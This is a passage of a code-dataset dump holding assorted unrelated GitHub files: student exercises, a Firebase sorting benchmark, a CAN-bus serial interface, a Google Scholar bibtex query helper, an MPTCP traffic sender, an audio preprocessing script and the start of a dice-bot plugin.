larkc-btn-large']\").click()\n return RemoveGroupPage(self.driver)\n","repo_name":"landoflaughs/test_feishu","sub_path":"test_feishu_selinum/page/create_group_page.py","file_name":"create_group_page.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"23319179152","text":"print(' Calculando sequência ')\r\nprint('--------------------------')\r\nprint('somente números acima \"5\"')\r\nn = int(input('Valor de n: '))\r\nprint('[0] - Calcular soma sequêncial')\r\nprint('[1] - Subtrair pares e somar grupos')\r\nprint('[2] - Calcular soma sequencial de dois em dois')\r\nopcao = int(input('Escolha a opção: '))\r\ns, sb, sq = 0, 0, 0\r\nif opcao == 0:\r\n for c in range(1, n+1):\r\n sq = sq + c\r\nelif opcao == 1:\r\n for c in range(1, n):\r\n if c % 2 == 0 and c < 5:\r\n sb = c * (-1)\r\n s = s + sb\r\n elif c % 1 == 0:\r\n s = s + c\r\n if c <= n:\r\n sq = s + ((2*n)-1)\r\nelif opcao == 2:\r\n for c in range(1, n, 2):\r\n s = s + c\r\n if c <= n:\r\n sq = s + ((2*n)-1)\r\nprint(f'Resultado da opção {opcao} é igual a {sq}')\r\n","repo_name":"Odnerb/Python","sub_path":"calculando_sequencias.py","file_name":"calculando_sequencias.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"28000828253","text":"from bisect import *\r\n\r\nclass OrderBooks:\r\n def __init__(self):\r\n self.books = {}\r\n \r\n def addorder(self, l, t):\r\n l.insert(bisect_right(l, t), t)\r\n\r\n\r\n def matchorders(self, book):\r\n buys = self.books[book][0]\r\n sells = self.books[book][1]\r\n r = len(buys) - 1\r\n l = 0\r\n while r >= 0 and l < len(sells):\r\n if buys[r][0] <= sells[l][0]:\r\n if buys[r][1] < sells[l][1]:\r\n sells[l][2] -= buys[r][2]\r\n # buys.pop()\r\n r -= 1\r\n elif buys[r][1] > sells[l][1]:\r\n buys[r][2] -= sells[l][2]\r\n # sells.remove()\r\n l += 1\r\n else:\r\n l += 1\r\n r -= 1\r\n else:\r\n break\r\n self.books[book][0] = self.books[book][0][:r+1]\r\n self.books[book][1] = self.books[book][1][l:]\r\n\r\n\r\n def add_order(self, book, operation, price, volume, order_id):\r\n if book not in self.books:\r\n self.books[book] = [[], []]\r\n \r\n operation = 1 if operation == \"SELL\" else 0\r\n\r\n\r\n self.addorder(self.books[book][operation], (price, volume, order_id))\r\n self.match_orders(book)\r\n\r\n def delete_order(self, book, orderid):\r\n if book not in self.books:\r\n return\r\n buys = self.books[book][0]\r\n sells = self.books[book][1]\r\n idx = -1\r\n for i in range(len(buys)):\r\n a, b, c = buys[i]\r\n if c == orderid:\r\n idx = i\r\n if idx != -1:\r\n buys.pop(idx)\r\n\r\n \r\n idx = -1\r\n for i in range(len(sells)):\r\n a, b, c = sells[i]\r\n if c == orderid:\r\n idx = i\r\n if idx != -1:\r\n sells.pop(idx)\r\n\r\n def readXML(self, filepath):\r\n #Read the XML file and process each line using the above functions\r\n pass\r\n\r\n\r\n","repo_name":"HrishikeshAmbekar/AuroDigitalTest","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"29070679028","text":"from bs4 import BeautifulSoup\nimport requests\n\nif __name__ == '__main__':\n url=\"http://bokjiro.go.kr/welInfo/retrieveWelInfoBoxList.do\"\n data = {\"searchIntClId\":\"01\",\"pageUnit\":\"300\"}\n with requests.post(url,data) as response:\n soup = BeautifulSoup(response.text,\"lxml\")\n\n # print(soup)\n #
아이돌봄서비스
\n # dts = soup.find_all(\"dt\",attrs={\"class\":\"tit\"})\n # for dt in dts:\n # title=dt.find(\"a\")\n # print(title.text)\n\n # 위에 긴걸 아래 짧게 쓸 수 있음\n n=1\n titles = soup.select(\"dt.tit > a\") #
text
\n for title in titles:\n print(n,title.text)\n n+=1","repo_name":"Wonchaeyeon/Programming-Python-","sub_path":"2학기/IX.프로젝트/web_crawoling_복지로.py","file_name":"web_crawoling_복지로.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"6249805670","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 3 16:56:05 2019\n\n@author: lpmatos\n\nimport pyrebase\n\nconfig = {\n \"apiKey\": \"apiKey\",\n \"authDomain\": \"gumplus-9d995.firebaseapp.com\",\n \"databaseURL\": \"https://gumplus-9d995.firebaseio.com\",\n \"storageBucket\": \"gumplus-9d995.appspot.com\"\n}\n\nfirebase = pyrebase.initialize_app(config)\n\n\"\"\"\n\nfrom firebase import firebase\nimport json\nfrom ordenacao import merge, bubble, insert, selection, quick, gnome, heap, comb, shell, otherquick\nimport timeit\n\nfirebase = firebase.FirebaseApplication('https://gumplus-9d995.firebaseio.com', None)\nresult = firebase.get('.', None)\nparsed_json = json.dumps(result, sort_keys=False, indent=4)\n\nlista = [elemento for elemento in result.items() if elemento[0] == 'Profissional']\n\nlista = lista[0][1]\n\nfiltro = []\n\nprint()\n\nfor profissional in range(len(lista)):\n pegando = lista[profissional]\n if('Nota' not in pegando):\n continue\n endereco = pegando['Endereco']\n nome = pegando['Nome']\n nota = pegando['Nota']\n filtro.append([nome, nota, endereco])\n \nfor elemento in range(len(filtro)):\n pegando = filtro[elemento]\n print(pegando)\n \nfiltro_1 = filtro.copy()\nfiltro_2 = filtro.copy()\nfiltro_3 = filtro.copy()\nfiltro_4 = filtro.copy()\nfiltro_5 = filtro.copy()\nfiltro_6 = filtro.copy()\nfiltro_7 = filtro.copy()\nfiltro_8 = filtro.copy()\nfiltro_9 = filtro.copy()\nfiltro_10 = filtro.copy()\n\nprint()\n\ndef arredondar(num):\n return float('%.20g'%( num))\n\nlista_tempo = []\n\ninicio = timeit.default_timer()\nordenado_1 = bubble.bubbleSort(filtro_1)\nfim = timeit.default_timer()\nduracao = fim - inicio\nlista_tempo.append(arredondar(duracao))\nprint ('Duracao Bubble: %f' % (duracao))\ninicio = timeit.default_timer()\nordenado_2 = merge.mergeSort(filtro_2)\nfim = timeit.default_timer()\nduracao = fim - inicio\nlista_tempo.append(arredondar(duracao))\nprint ('Duracao Merge: %f' % (duracao))\ninicio = timeit.default_timer()\nordenado_3 = selection.selectionSort(filtro_3)\nfim = timeit.default_timer()\nduracao = fim - inicio\nlista_tempo.append(arredondar(duracao))\nprint ('Duracao Selection: %f' % (duracao))\ninicio = timeit.default_timer()\nordenado_4 = quick.quickSort(filtro_4, 0, len(filtro_4) - 1)\nfim = timeit.default_timer()\nduracao = fim - inicio\nlista_tempo.append(arredondar(duracao))\nprint ('Duracao Quick: %f' % (duracao))\ninicio = timeit.default_timer()\nordenado_5 = insert.insertionSort(filtro_5)\nfim = timeit.default_timer()\nduracao = fim - inicio\nlista_tempo.append(arredondar(duracao))\nprint ('Duracao Insertion: %f' % (duracao))\ninicio = timeit.default_timer()\nordenado_6 = gnome.gnomeSort(filtro_6)\nfim = timeit.default_timer()\nduracao = fim - inicio\nlista_tempo.append(arredondar(duracao))\nprint ('Duracao Gnome: %f' % (duracao))\ninicio = timeit.default_timer()\nordenado_7 = heap.heapSort(filtro_7)\nfim = timeit.default_timer()\nduracao = fim - inicio\nlista_tempo.append(arredondar(duracao))\nprint ('Duracao Heap: %f' % (duracao))\ninicio = timeit.default_timer()\nordenado_8 = comb.combSort(filtro_8)\nfim = timeit.default_timer()\nduracao = fim - inicio\nlista_tempo.append(arredondar(duracao))\nprint ('Duracao Comb: %f' % (duracao))\ninicio = timeit.default_timer()\nordenado_9 = shell.shellSort(filtro_9)\nfim = timeit.default_timer()\nduracao = fim - inicio\nlista_tempo.append(arredondar(duracao))\nprint ('Duracao Shell: %f' % (duracao))\ninicio = timeit.default_timer()\nordenado_10 = otherquick.quick(filtro_10, 0, len(filtro_10))\nfim = timeit.default_timer()\nduracao = fim - inicio\nlista_tempo.append(arredondar(duracao))\nprint ('Duracao Other: %f' % (duracao))\n\nprint()\nprint('Menor:', min(lista_tempo))\nprint('Maior:', max(lista_tempo))\n\nlista = [{\"Nome\":filtro_4[elemento][0], \"Nota\":filtro_4[elemento][1], \"Endereco\":filtro_4[elemento][2]} \n for elemento in range(len(filtro_4))]\n\nprint(lista)\n\ndicionario = {\"Profissional\":lista}\n\n\nprint()\nprint(len(result))\nprint()\nprint(result[\"Profissional\"])\nresult[\"Profissional\"] = lista\nprint()\nprint(len(result[\"Profissional\"]))\nprint()\nprint(result[\"Profissional\"])\nprint()\nprint(len(result[\"Profissional\"]))\n\nprint(result)\n\nparsed_json = json.dumps(result[\"Profissional\"], sort_keys=False, indent=4)\n\nprint(parsed_json)\n\npost = firebase.put('.', '/Profissional', result[\"Profissional\"])\nprint(post)\nprint()\nprint(lista_tempo)\n\nalgoritmos = [elemento for elemento in range(1, 10)]\nprint(algoritmos)\n\n\nfrom matplotlib import pyplot as plt\n\nnomes = (\"Bubble\", \"Merge\", \"Selection\", \"Quick\", \"Insertion\", \"Gnome\", \"Heap\", \"Comb\", \"Shell\", \"Other\")\n\nplt.figure(0, figsize=(15, 6))\nplt.bar(nomes, lista_tempo, width = 0.7, bottom = 0, linewidth = 2.0, align = 'center')\nplt.title('Elementos ordenados')\nplt.xlabel('Algoritmos', fontsize = 15)\nplt.ylabel('Tempo de Execução', fontsize = 15)\nplt.savefig('Figura_2.pdf') \n\n\n","repo_name":"thiagosantanap/Projeto-PI","sub_path":"Backend/conexao.py","file_name":"conexao.py","file_ext":"py","file_size_in_byte":4794,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"38843349380","text":"# coding: utf-8\n\n\"\"\"\nInterface for slcan compatible interfaces (win32/linux).\n\n.. note::\n\n Linux users can use slcand or socketcan as well.\n\n\"\"\"\n\nfrom __future__ import absolute_import\n\nimport time\nimport logging\n\nfrom can import BusABC, Message\n\nlogger = logging.getLogger(__name__)\n\ntry:\n import serial\nexcept ImportError:\n logger.warning(\"You won't be able to use the slcan can backend without \"\n \"the serial module installed!\")\n serial = None\n\n\nclass slcanBus(BusABC):\n \"\"\"\n slcan interface\n \"\"\"\n\n # the supported bitrates and their commands\n _BITRATES = {\n 10000: 'S0',\n 20000: 'S1',\n 50000: 'S2',\n 100000: 'S3',\n 125000: 'S4',\n 250000: 'S5',\n 500000: 'S6',\n 750000: 'S7',\n 1000000: 'S8',\n 83300: 'S9'\n }\n\n _SLEEP_AFTER_SERIAL_OPEN = 2 # in seconds\n\n LINE_TERMINATOR = b'\\r'\n\n def __init__(self, channel, ttyBaudrate=115200, bitrate=None,\n btr=None, sleep_after_open=_SLEEP_AFTER_SERIAL_OPEN,\n rtscts=False, **kwargs):\n \"\"\"\n :raise ValueError: if both *bitrate* and *btr* are set\n\n :param str channel:\n port of underlying serial or usb device (e.g. /dev/ttyUSB0, COM8, ...)\n Must not be empty.\n :param int ttyBaudrate:\n baudrate of underlying serial or usb device\n :param int bitrate:\n Bitrate in bit/s\n :param str btr:\n BTR register value to set custom can speed\n :param float poll_interval:\n Poll interval in seconds when reading messages\n :param float sleep_after_open:\n Time to wait in seconds after opening serial connection\n :param bool rtscts:\n turn hardware handshake (RTS/CTS) on and off\n \"\"\"\n\n if not channel: # if None or empty\n raise TypeError(\"Must specify a serial port.\")\n\n if '@' in channel:\n (channel, ttyBaudrate) = channel.split('@')\n\n self.serialPortOrig = serial.serial_for_url(\n channel, baudrate=ttyBaudrate, rtscts=rtscts)\n\n self._buffer = bytearray()\n\n time.sleep(sleep_after_open)\n\n if bitrate is not None and btr is not None:\n raise ValueError(\"Bitrate and btr mutually exclusive.\")\n\n if bitrate is not None:\n self.close()\n if bitrate in self._BITRATES:\n self.write(self._BITRATES[bitrate])\n else:\n raise ValueError(\"Invalid bitrate, choose one of \" + (', '.join(self._BITRATES)) + '.')\n\n if btr is not None:\n self.close()\n self.write(\"s\" + btr)\n\n self.open()\n\n super(slcanBus, self).__init__(channel, ttyBaudrate=115200,\n bitrate=None, rtscts=False, **kwargs)\n\n def write(self, string):\n self.serialPortOrig.write(string.encode() + self.LINE_TERMINATOR)\n self.serialPortOrig.flush()\n\n def open(self):\n self.write('O')\n\n def close(self):\n self.write('C')\n\n def _recv_internal(self, timeout):\n if timeout != self.serialPortOrig.timeout:\n self.serialPortOrig.timeout = timeout\n\n canId = None\n remote = False\n extended = False\n frame = []\n\n # First read what is already in the receive buffer\n while (self.serialPortOrig.in_waiting and\n self.LINE_TERMINATOR not in self._buffer):\n self._buffer += self.serialPortOrig.read(1)\n\n # If we still don't have a complete message, do a blocking read\n if self.LINE_TERMINATOR not in self._buffer:\n self._buffer += self.serialPortOrig.read_until(self.LINE_TERMINATOR)\n\n if self.LINE_TERMINATOR not in self._buffer:\n # Timed out\n return None, False\n\n readStr = self._buffer.decode()\n del self._buffer[:]\n if not readStr:\n pass\n elif readStr[0] == 'T':\n # extended frame\n canId = int(readStr[1:9], 16)\n dlc = int(readStr[9])\n extended = True\n for i in range(0, dlc):\n frame.append(int(readStr[10 + i * 2:12 + i * 2], 16))\n elif readStr[0] == 't':\n # normal frame\n canId = int(readStr[1:4], 16)\n dlc = int(readStr[4])\n for i in range(0, dlc):\n frame.append(int(readStr[5 + i * 2:7 + i * 2], 16))\n elif readStr[0] == 'r':\n # remote frame\n canId = int(readStr[1:4], 16)\n dlc = int(readStr[4])\n remote = True\n elif readStr[0] == 'R':\n # remote extended frame\n canId = int(readStr[1:9], 16)\n dlc = int(readStr[9])\n extended = True\n remote = True\n\n if canId is not None:\n msg = Message(arbitration_id=canId,\n is_extended_id=extended,\n timestamp=time.time(), # Better than nothing...\n is_remote_frame=remote,\n dlc=dlc,\n data=frame)\n return msg, False\n return None, False\n\n def send(self, msg, timeout=None):\n if timeout != self.serialPortOrig.write_timeout:\n self.serialPortOrig.write_timeout = timeout\n\n if msg.is_remote_frame:\n if msg.is_extended_id:\n sendStr = \"R%08X%d\" % (msg.arbitration_id, msg.dlc)\n else:\n sendStr = \"r%03X%d\" % (msg.arbitration_id, msg.dlc)\n else:\n if msg.is_extended_id:\n sendStr = \"T%08X%d\" % (msg.arbitration_id, msg.dlc)\n else:\n sendStr = \"t%03X%d\" % (msg.arbitration_id, msg.dlc)\n\n sendStr += \"\".join([\"%02X\" % b for b in msg.data])\n self.write(sendStr)\n\n def shutdown(self):\n self.close()\n self.serialPortOrig.close()\n\n def fileno(self):\n if hasattr(self.serialPortOrig, 'fileno'):\n return self.serialPortOrig.fileno()\n # Return an invalid file descriptor on Windows\n return -1\n","repo_name":"CanBusHack/cmap","sub_path":"venv/Lib/site-packages/can/interfaces/slcan.py","file_name":"slcan.py","file_ext":"py","file_size_in_byte":6215,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"86"} +{"seq_id":"4557475679","text":"\"\"\"\nFilreader enriching files with synonyms out of wordnet\n\"\"\"\n\nimport sys\nfrom os import listdir, rename, makedirs, remove\nfrom os.path import join, isfile, dirname, exists\nimport shutil\nfrom pydub import AudioSegment\nimport subprocess\n\n__author__ = \"kaufmann-a@hotmail.ch\"\ntemp_path = \"./temp\"\n\n#Beispiel ffmpeg mp4 streams auftrennen und zusammenmergen: ffmpeg -i test.mp4 -filter_complex \"[0:1][0:2]amerge=inputs=2[ab]\" -map [ab] 1.wav\n#Hier wurden streams 2 und 3 gemerged\ndef normalize(file, destination, db = -20.0):\n def match_target_amplitude(sound, target_dBFS):\n change_in_dBFS = target_dBFS - sound.dBFS\n return sound.apply_gain(change_in_dBFS)\n\n sound = AudioSegment.from_file(file, \"wav\")\n normalized_sound = match_target_amplitude(sound, db)\n normalized_sound.export(destination, format=\"wav\")\n\ndef calculate_ratio_instr_vocs(instr, voc):\n instrlevel = AudioSegment.from_file(instr, \"wav\").dBFS\n voclevel = AudioSegment.from_file(voc, \"wav\").dBFS\n targetDB_VOC = -20 + (-20 * (voclevel / instrlevel - 1))\n return targetDB_VOC\n\ndef copy_files(sourcedir, outputdir, maxCopy, override):\n src_files= listdir(sourcedir)\n for file in src_files:\n if maxCopy == 0: break\n old_file = join(sourcedir, file)\n new_folder = join(outputdir, file)\n new_songname_instr = 'instrumental_' + file\n new_songname_vocals = 'vocals_' + file\n new_songfile_instr = join(new_folder, new_songname_instr)\n new_songfile_vocals = join(new_folder, new_songname_vocals)\n if not exists(new_folder): makedirs(new_folder)\n if exists(new_songfile_instr) and override: remove(new_songfile_instr)\n if exists(new_songfile_vocals) and override: remove(new_songfile_vocals)\n if (not exists(new_songfile_vocals) and not exists(new_songfile_instr)) or override:\n cmd = \"ffmpeg -i \\\"\" + old_file + \"\\\" -filter_complex \\\"[0:a]channelsplit=channel_layout=stereo[l][r]\\\" -map [l] -ac 2 -ar 44100 \\\"\" + join(temp_path, new_songname_instr) + \"\\\" -map [r] -ac 2 -ar 44100 \\\"\" + join(temp_path, new_songname_vocals) + \"\\\"\"\n subprocess.check_call(cmd, shell=True) # cwd = cwd\n\n vocal_volume = calculate_ratio_instr_vocs(join(temp_path, new_songname_instr), join(temp_path, new_songname_vocals))\n\n normalize(join(temp_path, new_songname_instr), new_songfile_instr, -20)\n normalize(join(temp_path, new_songname_vocals), new_songfile_vocals, vocal_volume)\n print(\"\\n\" + new_songname_vocals + \" and \" + new_songname_instr + \" converted\" + \"\\n\")\n remove(join(temp_path, new_songname_vocals))\n remove(join(temp_path, new_songname_instr))\n maxCopy -= 1\n\nif __name__ == '__main__':\n #Call script with scriptname maxfiles override\n #Example call: musdb18_fileprocessing.py 20 True\n #This will convert the first twenty files in the source dir and override already existing files in the outputdir\n\n maxCopy = -1\n override = True\n unmix_server = '//192.168.1.29/unmix-server'\n\n print('Argument List:', str(sys.argv))\n\n if sys.argv.__len__() == 2:\n unmix_server = sys.argv[1]\n\n sources = unmix_server + \"/1_sources/MIR-1K/UndividedWavfile\"\n destination = unmix_server + \"/2_prepared/MIR-1K\"\n if not exists(temp_path): makedirs(temp_path)\n\n copy_files(sources, destination, maxCopy, override)\n\n print('Finished converting')\n\n","repo_name":"unmix-io/tools","sub_path":"collection-processing/MIR-1K_fileprocessing/mir-1k_fileprocessing.py","file_name":"mir-1k_fileprocessing.py","file_ext":"py","file_size_in_byte":3437,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"24872699993","text":"import numpy as np\n\ndef lsq(X, Y, b0=True):\n \"\"\"Least squares solution directly from numpy.\n\n :param X: Feature matrix with features in columns, examples (N) in rows.\n :param Y: Label vector (or matrix)\n :param b0: If ``True``, include intercept, otherwise don't.\n :type b0: :obj:`bool`\n :returns: Dictonary labeled b\\* where \\* is 0 for intercept and 1...N for coefficients.\n :rtype: :obj:`dict`\n\n \"\"\"\n if b0:\n b = np.linalg.lstsq(np.r_['1,2', np.ones((X.shape[0], 1)), X], Y)[0]\n else:\n b = np.linalg.lstsq(X, Y)[0]\n return dict(\n zip(['b{}'.format(i) for i in np.arange(b.shape[0]) + (1 - b0)], b))\n","repo_name":"betaplane/cezanne","sub_path":"python/linear/numpy.py","file_name":"numpy.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"69814447324","text":"# Hackerrank problem Introduction to sets\n\ndef average(array):\n st = set(array)\n s = sum(st)\n l = len(st)\n avg = s/l\n return avg\n\nif __name__ == '__main__':\n n = int(input())\n arr = list(map(int, input().split()))\n result = average(arr)\n print(result)","repo_name":"krishna-rawat-hp/HackerRank-solution-python","sub_path":"introduction_to_sets.py","file_name":"introduction_to_sets.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"71175704285","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 12 20:33:02 2021\r\n\r\n@author: Doğukan Bozkurt\r\n\"\"\"\r\nimport math\r\n#Forier series funcs.\r\n\r\na_1=int(input(\"Please enter a value for a1: \"))\r\nb_1=int(input(\"Please enter a value for b1: \"))\r\n#Teta will be converted Degree to Radian\r\nTeta_1=(int(input(\"Please enter a value for Teta_1: \")))*math.pi/180\r\nt=7\r\nprint(\"\\na_1: {0}\\nb_1: {1}\\nTeta_1: {2}\".format(a_1,b_1,Teta_1))\r\n\r\nA_1= math.sqrt(a_1**2+b_1**2)\r\n\r\ng_1=A_1*math.cos(math.pi/4*t+Teta_1)\r\n\r\nprint(\"g_1({0})= {1}\".format(t,g_1))\r\n","repo_name":"dkbozkurt/OOP_Python_Course_University","sub_path":"Exp3/Exp3_q1.py","file_name":"Exp3_q1.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"15900517036","text":"from __future__ import print_function\n\n\ntry:\n # python 2\n from urllib2 import Request, urlopen, quote\nexcept ImportError:\n # python 3\n from urllib.request import Request, urlopen, quote\n\ntry:\n # python 2\n from htmlentitydefs import name2codepoint\nexcept ImportError:\n # python 3\n from html.entities import name2codepoint\n\nimport re\nimport hashlib\nimport random\nimport sys\nimport os\nimport subprocess\nimport optparse\nimport logging\n\n\n# fake google id (looks like it is a 16 elements hex)\nrand_str = str(random.random()).encode('utf8')\ngoogle_id = hashlib.md5(rand_str).hexdigest()[:16]\n\nGOOGLE_SCHOLAR_URL = \"http://scholar.google.com\"\n# the cookie looks normally like:\n# 'Cookie' : 'GSP=ID=%s:CF=4' % google_id }\n# where CF is the format (e.g. bibtex). since we don't know the format yet, we\n# have to append it later\nHEADERS = {'User-Agent': 'Mozilla/5.0',\n 'Cookie': 'GSP=ID=%s' % google_id}\n\nFORMAT_BIBTEX = 4\nFORMAT_ENDNOTE = 3\nFORMAT_REFMAN = 2\nFORMAT_WENXIANWANG = 5\n\n\ndef query(searchstr, outformat=FORMAT_BIBTEX, allresults=False):\n \"\"\"Query google scholar.\n This method queries google scholar and returns a list of citations.\n Parameters\n ----------\n searchstr : str\n the query\n outformat : int, optional\n the output format of the citations. Default is bibtex.\n allresults : bool, optional\n return all results or only the first (i.e. best one)\n Returns\n -------\n result : list of strings\n the list with citations\n \"\"\"\n logging.debug(\"Query: {sstring}\".format(sstring=searchstr))\n searchstr = '/scholar?q='+quote(searchstr)\n url = GOOGLE_SCHOLAR_URL + searchstr\n header = HEADERS\n header['Cookie'] = header['Cookie'] + \":CF=%d\" % outformat\n request = Request(url, headers=header)\n response = urlopen(request)\n html = response.read()\n html = html.decode('utf8')\n # grab the links\n tmp = get_links(html, outformat)\n\n # follow the bibtex links to get the bibtex entries\n result = list()\n if not allresults:\n tmp = tmp[:1]\n for link in tmp:\n url = GOOGLE_SCHOLAR_URL+link\n request = Request(url, headers=header)\n response = urlopen(request)\n bib = response.read()\n bib = bib.decode('utf8')\n result.append(bib)\n return result\n\n\ndef get_links(html, outformat):\n \"\"\"Return a list of reference links from the html.\"\"\"\n if outformat == FORMAT_BIBTEX:\n refre = re.compile(r' len(x)-1:\n count = count + (j - i) // 2\n i = j\n break\n count = count + (j-i)//2\n i = j\nprint(count)\n","repo_name":"Abadonna13/GB","sub_path":"Python_seminars/Task_43.py","file_name":"Task_43.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"15580014184","text":"\"\"\"\nSender python implementation sending random traffic to receiver.\nCredit to Wen-Chien Chen and Kevin Han which implemented this:\nhttps://bitbucket.org/iamtheone188/cs244-2015-wckh-mptcp/src/master/\nhttps://reproducingnetworkresearch.wordpress.com/2015/05/31/cs-244-15-reproducing-the-3gwifi-application-level-latency-results-in-mptcp/\n\"\"\"\nfrom argparse import ArgumentParser\nfrom struct import pack\nfrom time import sleep\nimport socket\nimport sys\nfrom monotonic import monotonic # Monotonic time to avoid issues from NTP adjustments\n\n# Parse arguments\nparser = ArgumentParser(description=\"Sender for MPTCP latency measurements\")\nparser.add_argument('--server', '-s', help=\"IP address of receiver\", required=True)\nparser.add_argument('--port', '-p', type=int, help=\"Port of receiver\", required=True)\nparser.add_argument('--size', type=int, help=\"Size of each packet in bytes\", default=1428)\nparser.add_argument('--time', '-t', type=int, help=\"Number of seconds to send for\", default=600)\nparser.add_argument('--bufsize', type=int, help=\"Send buffer size in KB\", default=200)\nparser.add_argument('--outfile', '-o', help=\"Name of output file\", required=True)\nargs = parser.parse_args()\n\nformat_string = \"i%dx\" % (args.size-4) # 4 byte counter\n\n\ndef main():\n try:\n f = open(args.outfile, 'w')\n f.write('pkt_id\\tsnd_t [s]\\tpayload [bytes]\\n')\n except IOError:\n sys.stderr.write(\"Could not open output file for writing\\n\")\n sys.exit(1)\n\n try:\n s = socket.socket(socket.AF_INET)\n s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, args.bufsize / 2 * 1000) # The kernel doubles the value set here\n s.connect((args.server, args.port))\n except socket.error:\n sys.stderr.write(\"Could not connect to receiver\\n\")\n sys.exit(1)\n\n print(\"Connected to receiver\")\n sleep(1) # Wait in case receiver needs to do some initial processing\n\n print(\"Starting packet flow\")\n start_time = monotonic()\n counter = 1\n while monotonic() - start_time < args.time:\n packet = pack(format_string, counter)\n s.send(packet)\n timestamp = monotonic()\n f.write(\"{}\\t{}\\t{}\\n\".format(counter, timestamp, args.size))\n counter += 1\n # sleep(1)\n\n print(\"Shutting down\")\n s.close()\n f.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"phyratokar/MPTCP-Mininet-Benchmark","sub_path":"sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"86"} +{"seq_id":"11465236964","text":"from heapq import heappush, heappop\nimport sys\ninput = sys.stdin.readline\nn, m = map(int, input().split())\n\nd = [-1 for _ in range(n + 1)]\nadj = [[] for _ in range(n + 1)]\n\nfor l in range(m):\n x, y, z = map(int, input().split())\n adj[x].append((y, z))\n adj[y].append((x, z))\n\nq = [(0, 1)]\nwhile q:\n dist, node = heappop(q)\n if d[node] != -1:\n continue\n d[node] = dist\n for dest, add in adj[node]:\n heappush(q, (dist + add, dest))\n\nfor l in range(1, n + 1):\n print(d[l])\n","repo_name":"python3lover/alphaprojects","sub_path":"activity_solutions/algorithms/dijkstras.py","file_name":"dijkstras.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"26534772934","text":"# 参考[OlivaDiceDocs](https://oliva.dicer.wiki/userdoc)实现的nonebot2骰娘插件\nimport contextlib\nimport random\nfrom typing import Optional\nimport diro\nfrom .constant import *\n\n\ndef to_circled(num: int, c: int) -> str:\n if num < 1 or num > 10:\n return \"?\"\n return str(num) if num < c else chr(0xA2) + chr(0xD8 + num)\n\n\ndef roll_success_level(res: int, rate: int, rule: int = 0) -> int:\n \"\"\"\n 成功等级, 0-大失败,1-失败,2-成功,3-困难成功,4-极难成功,5-大成功\n\n Args:\n res: 骰子结果\n rate: 检测值\n rule: 规则\n \"\"\"\n if rule == 0:\n return _roll_success_level_rule0(res, rate)\n elif rule == 1:\n return _roll_success_level_rule1(res, rate)\n elif rule == 2:\n return _roll_success_level_rule2(res, rate)\n elif rule == 3:\n return _roll_success_level_rule3(res, rate)\n elif rule == 4:\n return _roll_success_level_rule4(res, rate)\n elif rule == 5:\n return _roll_success_level_rule5(res, rate)\n elif rule == 6:\n if res > rate:\n return 0 if res == 100 or res % 11 == 0 else 1\n else:\n return 5 if res == 1 or res % 11 == 0 else 2\n else:\n return -1\n\n\ndef _roll_success_level_rule5(res, rate):\n if res >= 99:\n return 0\n if res <= 2 and res < rate / 10:\n return 5\n if res <= rate / 5:\n return 4\n if res <= rate / 2:\n return 3\n if res <= rate:\n return 2\n return 1 if rate >= 50 or res < 96 else 0\n\n\ndef _roll_success_level_rule4(res, rate):\n if res == 100:\n return 0\n if res <= 5 and res <= rate / 10:\n return 5\n if res <= rate / 5:\n return 4\n if res <= rate / 2:\n return 3\n if res <= rate:\n return 2\n return 1 if rate >= 50 or res < 96 + rate / 10 else 0\n\n\ndef _roll_success_level_rule3(res, rate):\n if res >= 96:\n return 0\n if res <= 5:\n return 5\n if res <= rate / 5:\n return 4\n if res <= rate / 2:\n return 3\n return 2 if res <= rate else 1\n\n\ndef _roll_success_level_rule2(res, rate):\n if res == 100:\n return 0\n if res <= 5 and res <= rate:\n return 5\n if res <= rate / 5:\n return 4\n if res <= rate / 2:\n return 3\n if res <= rate:\n return 2\n return 1 if res < 96 else 0\n\n\ndef _roll_success_level_rule1(res, rate):\n if res == 100:\n return 0\n if res == 1 or (res <= 5 and rate >= 50):\n return 5\n if res <= rate / 5:\n return 4\n if res <= rate / 2:\n return 3\n if res <= rate:\n return 2\n return 1 if rate >= 50 or res < 96 else 0\n\n\ndef _roll_success_level_rule0(res, rate):\n if res == 100:\n return 0\n if res == 1:\n return 5\n if res <= rate / 5:\n return 4\n if res <= rate / 2:\n return 3\n if res <= rate:\n return 2\n return 1 if rate >= 50 or res < 96 else 0\n\n\ndef long_insane():\n sym_res = random.randint(1, 10)\n res = f\"调查员的疯狂发作-总结症状:1D10={sym_res}\\n症状: \\n\"\n fmap = {\"dur\" : f\"1D10={random.randint(1, 10)}\"}\n j = random.randint(1, 100)\n if sym_res == 10:\n fmap[\"detail_roll\"] = f\"1D100={j}\"\n fmap[\"detail\"] = Panic[j]\n elif sym_res 